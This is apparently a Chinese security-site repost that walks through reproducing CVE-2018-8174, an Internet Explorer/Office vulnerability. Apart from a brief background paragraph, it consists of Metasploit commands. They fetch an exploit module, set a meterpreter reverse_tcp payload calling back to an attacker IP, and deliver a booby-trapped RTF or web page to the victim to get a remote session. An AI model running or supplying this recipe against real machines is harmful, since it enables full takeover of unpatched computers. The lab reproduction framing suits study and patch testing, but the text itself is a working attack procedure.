标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-1603]   作者: 特仑苏 发表于: [2018-07-11]

本文共 [1210] 位读者顶过

摘要: 0×01前言该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁 ...

0×01前言

该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。

0×02漏洞复现

在线下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录/

cd CVE-2018-8174-msf/

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174

set PAYLOAD windows/meterpreter/reverse_tcp

set srvhost 192.168.107.128

set lhost 192.168.107.128

exploit

1、进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

cd /root/.msf4/local/

2、IE浏览器打开 http://192.168.107.128:8080 即可获得会话


本文出自:https://www.toutiao.com/a6576522589890413060/[出自:jiwo.org]

评论

暂无
发表评论
 返回顶部 
热度(1210)
 关注微信